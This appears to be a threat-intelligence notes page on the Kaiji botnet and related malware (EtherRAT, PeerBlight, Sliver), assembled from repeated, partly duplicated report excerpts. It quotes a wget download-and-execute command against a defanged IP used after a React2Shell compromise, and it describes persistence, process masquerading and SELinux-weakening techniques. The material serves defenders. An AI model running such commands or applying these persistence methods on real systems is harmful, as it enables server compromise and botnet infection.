Kaiji

"...final payloads were the Kaiji and Rustobot botnets and the Sliver implant."

"...targeting security researchers by hiding a malicious backdoor in CVE-2024-6387 proof of concept code, and when running the PoC it will lead to infection of the server with Kaiji malware."

The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.

The commands follow the same methodology: download a shell script, execute it via bash, and in some cases delete the script to remove evidence.

After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'

The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... Under certain conditions, this can enable an attacker to execute arbitrary code on the server.

Kaiji establishes persistence via multiple mechanisms: systemd services, crontab tasks, init.d scripts, rc.local and profile.d modifications...

".../etc/init.d/dns-udp4 is also created. It is a SysV init script that ensures /boot/system.pub is executed automatically at system startup..."

The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.

The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service... If executed with root privileges... creates a systemd service... CrossC2 check.sh creates and starts a service... EtherRAT establishes persistence through: systemd.

KAIJI: A DDoS botnet capable of evading detection, setting up persistence, and altering SELinux policies. Its deployment involved moving system binaries, using bind mount techniques, and creating multiple backdoors for control.

"...drops and runs the file /etc/profile.d/gateway.sh ... overrides several common system commands: ps, ss, netstat, dir, ls, find, and lsof ... filters out..." | "Kaiji malware ... copies itself to /etc/profile.d/bash.cfg ... /etc/profile.d/bash.cfg.sh will run at login and execute /etc/profile.d/bash.cfg"

Kaiji establishes persistence via multiple mechanisms: systemd services, crontab tasks, init.d scripts, rc.local and profile.d modifications...

".../etc/init.d/dns-udp4 is also created. It is a SysV init script that ensures /boot/system.pub is executed automatically at system startup..."

The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.

The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service... If executed with root privileges... creates a systemd service... CrossC2 check.sh creates and starts a service... EtherRAT establishes persistence through: systemd.

KAIJI: A DDoS botnet capable of evading detection, setting up persistence, and altering SELinux policies. Its deployment involved moving system binaries, using bind mount techniques, and creating multiple backdoors for control.

"...drops and runs the file /etc/profile.d/gateway.sh ... overrides several common system commands: ps, ss, netstat, dir, ls, find, and lsof ... filters out..." | "Kaiji malware ... copies itself to /etc/profile.d/bash.cfg ... /etc/profile.d/bash.cfg.sh will run at login and execute /etc/profile.d/bash.cfg"

If executed with root privileges, copies the downloaded payload to /usr/bin/sshd-agent... Kaiji... masquerades as legitimate system libraries and configuration files (libgdi.so.0.8.1, opt.services.cfg, System.mod).

PeerBlight overwrites argv[0] in memory to hide its original path ... and replaces it with [ksoftirqd].

They deployed KAIJI malware and downloaded a script (00.sh) to erase traces and kill other mining processes.

The commands follow the same methodology: download a shell script, execute it via bash, and in some cases delete the script to remove evidence ( rm -r wocaosinm.sh ).

"One of our honeypots has an exposed misconfigured SSH access, with weak password. The threat actors exploited our honeypot and infected it with Kaiji malware."

C2 Tracker is a free-to-use-community-driven IOC feed that uses Shodan and Censys searches to collect IP addresses of known malware/botnet/C2 infrastructure.

"...C2 channels over HTTP/HTTPS and WebSocket (TLS-capable)... The domain su6s.su is used as the C2 server..."

"...an embedded SOCKS5 and HTTP proxy... proxy malicious traffic, leveraging compromised systems as part of a botnet."

This script downloaded the XMRig cryptocurrency miner... The attackers also loaded the d5.sh Bash script onto the compromised host to download the Sliver implant... The attackers employed the check.sh Bash script to download ELF executables (a_x86 / a_x64) from a server.

KAIJI: A DDoS botnet capable of evading detection, setting up persistence, and altering SELinux policies.

KAIJI: A DDoS botnet capable of evading detection, setting up persistence, and altering SELinux policies.

"...weakens security controls by auto-generating and installing a SELinux policy to allow previously denied actions by a process named system.pub."